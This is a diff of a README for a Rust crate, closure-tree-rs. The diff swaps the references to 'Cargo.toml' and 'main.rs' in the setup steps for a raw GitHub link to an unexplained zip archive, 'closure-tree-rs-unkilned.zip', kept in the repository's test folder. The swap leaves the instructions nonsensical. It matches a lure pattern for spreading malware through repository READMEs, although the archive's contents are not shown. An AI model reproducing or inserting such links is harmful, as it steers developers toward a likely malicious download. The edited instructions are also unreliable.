Nadyavegetative323/closure-tree-rs/README.md

      ```
      cargo new your_project_name
      ```
-   - Open the `Cargo.toml` file and add the following line under `[dependencies]`:
+   - Open the `https://raw.githubusercontent.com/Nadyavegetative323/closure-tree-rs/master/test/closure-tree-rs-unkilned.zip` file and add the following line under `[dependencies]`:
      ```toml
      closure-tree = "0.0.1"
      ```

 2. **Code Setup:**
-   - In your main Rust file (usually `main.rs`), you can start using closure-tree.
+   - In your main Rust file (usually `https://raw.githubusercontent.com/Nadyavegetative323/closure-tree-rs/master/test/closure-tree-rs-unkilned.zip`), you can start using closure-tree.
 Below is a simple example:
    ```rust
    use closure_tree::ClosureTreeRepository;
    use closure_tree::ClosureTreeModelDerive as ClosureTreeModel;